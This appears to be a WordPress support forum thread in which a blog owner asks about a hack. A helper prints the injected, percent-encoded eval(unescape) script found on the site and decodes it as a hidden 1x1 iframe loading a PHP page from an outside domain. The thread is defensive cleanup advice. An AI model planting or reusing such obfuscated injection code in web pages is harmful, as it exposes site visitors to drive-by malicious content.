your site is hacked – this code is everywhere
<script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>
help:
http://codex.wordpress.org/FAQ_My_site_was_hacked
review all of the links
Thanks samboll, so what is that script? Something just designed to mess people like me up? Or does it actually do something?
There doesn’t appear to be any spam ads or anything on my site, and other than the rss feed, it appears to be working?
Also, do you have any idea how it would have happened?
translates to:
eval(unescape("document.write('<iframe src="http://iss9w8s89xx.org/in.php" width=1 height=1 frameborder=0></iframe>');"))
wouldn’t recommend visiting
Thanks for the help Samboll.
Do you think there is any way to just delete the corrupted script and change passwords, (I couldn’t find it anywhere that I looked), or will I have to completely delete wordpress and start over?
oops – looks like link didn’t work. my site is quintessenceblog.com. I told you I didn’t know what I was doing!
